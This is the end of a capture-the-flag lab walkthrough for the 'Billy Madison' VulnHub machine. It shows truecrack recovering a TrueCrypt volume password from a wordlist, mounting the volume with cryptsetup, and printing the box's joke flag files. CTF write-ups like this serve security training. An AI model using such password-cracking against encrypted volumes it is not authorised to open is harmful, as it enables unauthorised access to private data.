root@KaiZen:~/vulnhub/bmadison1.1# truecrack -v -t BowelMovement -w truecrack.lst
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com 

Memory initialization... 

COUNT PASSWORD RESULT
0 the NO
8077 execrable YES
Found password: "execrable"
Password length: "10"
Total computations: "8078"

Back on the target I open the TrueCrypt volume with cryptsetup, which is already installed, and mount it on a directory in eric’s home (the mount point bmaddd has to exist beforehand):


eric@BM:~$ sudo cryptsetup --type tcrypt open /PRIVATE/BowelMovement bmaddd && sudo mount /dev/mapper/bmaddd bmaddd
Enter passphrase: 

Once mounted I see a file called secret.zip and unzip it:


eric@BM:~/bmaddd$ ls -la
total 22
drwxr-xr-x 3 root root 16384 Dec 31 1969 .
drwxr-xr-x 10 eric eric 4096 Nov 13 11:28 ..
drwxr-xr-x 2 root root 512 Aug 21 09:39 $RECYCLE.BIN
-rwxr-xr-x 1 root root 1000 Aug 21 09:22 secret.zip

eric@BM:~/bmaddd$ sudo unzip secret.zip
Archive: secret.zip
 inflating: Billy_Madison_12th_Grade_Final_Project.doc
 inflating: THE-END.txt
eric@BM:~/bmaddd$ ls -la
total 23
drwxr-xr-x 3 root root 16384 Nov 13 11:31 .
drwxr-xr-x 10 eric eric 4096 Nov 13 11:28 ..
-rwxr-xr-x 1 root root 599 Aug 20 21:08 Billy_Madison_12th_Grade_Final_Project.doc
drwxr-xr-x 2 root root 512 Aug 21 09:39 $RECYCLE.BIN
-rwxr-xr-x 1 root root 1000 Aug 21 09:22 secret.zip
-rwxr-xr-x 1 root root 381 Aug 21 16:22 THE-END.txt

Inside the zip file is Billy’s paper!! Whohoo!!

eric@BM:~/bmaddd$ sudo cat Billy_Madison_12th_Grade_Final_Project.doc
Billy Madison
Final Project
Knibb High

The Industrial Revolution

The Industrial Revolution to me is just like a story I know called “The Puppy Who Lost His Way.”
The world was changing, and the puppy was getting… bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy – “society” – knew where to find ’em.
Except that the puppy was a dog.
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!

-BM

The zip file also included a parting message from the CTF creator


eric@BM:~/bmaddd$ sudo cat THE-END.txt
Congratulations!

If you're reading this, you win!

I hope you had fun. I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us
